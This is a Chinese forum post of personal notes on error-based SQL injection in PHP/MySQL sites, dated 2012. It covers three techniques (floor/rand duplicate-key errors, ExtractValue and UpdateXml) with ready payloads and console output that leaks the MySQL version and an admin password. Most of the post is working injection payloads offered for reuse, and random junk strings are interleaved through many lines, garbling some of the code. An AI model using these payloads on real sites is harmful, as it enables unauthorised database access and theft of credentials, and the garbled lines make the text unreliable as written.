放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
& T8 R- i. L% h/ \1 F9 c实际测试环境:/ g3 Y5 e1 L8 z7 a* s; c% R
; G {3 u5 C2 x
1 j: T1 h# I: L U
mysql> show tables;
6 O) S# z) y L: V+----------------++ p' m% Z* w# i
| Tables_in_test |0 }0 W9 B6 Z* M _& E( j# s
+----------------+
# c# u1 ?1 J; i/ R| admin |
# t# B: X# O7 m9 [| article |
% |4 \3 A# G! {7 b! K2 D+----------------+
# ^3 p1 D* i; w; |8 A# Z: j
: G: ^. ~2 E: p/ n# \ ) u& n& O. ]$ x6 y' ~
s, [: @+ G! {) Zmysql> describe admin;
, Q% T8 j S( r: t9 ^) q* P+-------+------------------+------+-----+---------+----------------+4 ]1 q3 z- \0 b b
| Field | Type | Null | Key | Default | Extra |" v* M+ b6 b; ]/ z% y
+-------+------------------+------+-----+---------+----------------+
! ]/ m' ]7 y( S$ @( D) R# Y+ N| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
7 I2 N0 p0 T- b. E& v+ g+ Y| user | varchar(50) | NO | | NULL | |
8 T' E3 H2 M5 \9 L9 {| pass | varchar(50) | NO | | NULL | |
# L: G8 r, }7 L* Y+-------+------------------+------+-----+---------+----------------+% Y) h; K5 \* ]2 \
! n2 c Z& ]: C( C2 `# G
7 L& [7 p1 [2 [9 k: d
9 G; v4 W$ f6 ^# k0 d4 Jmysql> describe article;! L$ G x. u8 `+ W( L: W2 L% O% t5 H
+---------+------------------+------+-----+---------+----------------+ z2 b% t* c" L: R+ f9 w# D0 ^
| Field | Type | Null | Key | Default | Extra |/ G. m7 R" u% \7 A# K
+---------+------------------+------+-----+---------+----------------+
1 E7 u+ E, G2 G$ X4 m+ u3 K z) k+ x| id | int(10) unsigned | NO | PRI | NULL | auto_increment |3 o1 `; R% {5 [0 `5 G2 ]
| title | varchar(50) | NO | | NULL | |
+ s1 v0 v) x0 ]& Z' s! i. c0 ]| content | varchar(50) | NO | | NULL | |
' I! h& d: D. T4 y7 P+---------+------------------+------+-----+---------+----------------+
8 ~ v3 q, t [$ }. C) T/ E1、通过floor报错
( J5 c) Z2 Q- e7 [& W+ h; K可以通过如下一些利用代码# `% J9 P) Q* O- K+ C0 [8 v
# M- C) j" @" C+ N ! v- P( p" v/ Q5 U
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x) W; C5 v# r0 O" o' @( C9 V7 h
from information_schema.tables group by x)a);
1 ]) u5 H& i, X2 B& E: i6 X
: q! r) W" B& K1 |- s
: C$ {2 u4 [6 Pand (select count(*) from (select 1 union select null union select !1)x
" F) v1 G+ K4 G# }+ Tgroup by concat((select table_name from information_schema.tables limit 1),
% ~" H8 C9 M& C: s+ W+ Yfloor(rand(0)*2)));
& L5 M. R* B- \2 x, M举例如下:% K# u; |) }9 T0 G1 n
首先进行正常查询:' f0 U6 g. d6 }. R0 H" e
. J2 g0 P' u" O0 I8 b4 ]6 X$ Rmysql> select * from article where id = 1;4 L' Q$ ?& |" O4 g6 _8 ~+ J
+----+-------+---------+
! ^# K- _5 C/ R3 L0 K8 N| id | title | content |
. \ v, X9 O9 ~+----+-------+---------+
7 Q9 T0 ]1 J# Q| 1 | test | do it | W6 ?0 V* D4 V c: A
+----+-------+---------+
: {; f8 r# ?8 I; z* ?! J4 v假如id输入存在注入的话,可以通过如下语句进行报错。# ~4 I: q1 |, s% b" K0 ?3 n
4 |- V1 m+ ^, R8 L* H+ I3 _
9 M- U4 F* f4 V6 Pmysql> select * from article where id = 1 and (select 1 from- x* v' n$ W& l/ n5 Y2 [
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
& j7 q4 b) }/ Y; X* `! EERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
3 V0 a. g: T( ]9 l可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
1 T1 P4 J' I) ^例如我们需要查询管理员用户名和密码:. [4 l0 [& n( v( V$ W1 t
Method1:
' y4 i3 J' C6 h4 i$ a5 ]# H4 P # e4 l* v- \0 S& o& z
" ` g5 H: b1 v5 b4 h
mysql> select * from article where id = 1 and (select 1 from$ R1 U6 q; K) L4 J& e
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
h* h* K- ?; x9 E7 Wfrom information_schema.tables group by x)a);
% q9 F6 g: N* DERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
: H3 F p6 U) zMethod2:& F% @& {# @: P8 u% J4 [- n9 t
% @2 S1 `+ P* ?! {
( X9 J, _) z1 ]8 Tmysql> select * from article where id = 1 and (select count(*)6 P( Q; \3 \. t
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
% _5 `( G0 V* }$ D; Bfloor(rand(0)*2)));
}" x5 n: q5 |8 a! oERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'& y" Q& r- A- y! s
2、ExtractValue
) z! C! {% \& a$ V, C- l. j. Y测试语句如下
1 e5 X. \# c1 T$ \3 b. ~: j- S
. V J7 k B# e2 Q
0 Q( E. [ J1 E; Y+ ?' Z( N- V& Gand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
% N7 Q7 w: B+ }$ w) V实际测试过程' j6 P C2 I3 G E2 |' F
# l5 S% `) m6 c. D e" S
* J0 }9 r l7 L9 B& N$ o9 O$ Zmysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,# O/ U) P8 l4 N
(select pass from admin limit 1)));--
+ [: k1 S/ X% ^ERROR 1105 (HY000): XPATH syntax error: '\admin888'
7 f0 S/ a4 k v: q8 C3、UpdateXml' ~- d& H- }% z* s1 M) F, i
测试语句7 ~1 j, {5 I/ e9 x
6 E1 W, w" H' A: @* E4 `' `
7 W% ?+ N9 i0 ?
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
+ D7 ]" m0 g; |; g实际测试过程0 T+ _4 X5 E% O
5 _. v% g* e: m: `/ v7 O0 |* m& g% |9 e
' Y0 N0 J9 F* h: Y B6 nmysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,! t7 c w: z J* ^5 c
(select pass from admin limit 1),0x5e24),1));% W6 F9 V* Y( ~
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'; u# ~% H. e/ q
All, thanks foreign guys., X5 {, g$ n3 {9 i" W: o. r
- _1 e& ^# `! [& f9 O* Y& b% E1 L3 }- s- U
|
发表于 2012-12-10 10:28:51
收藏
支持
反对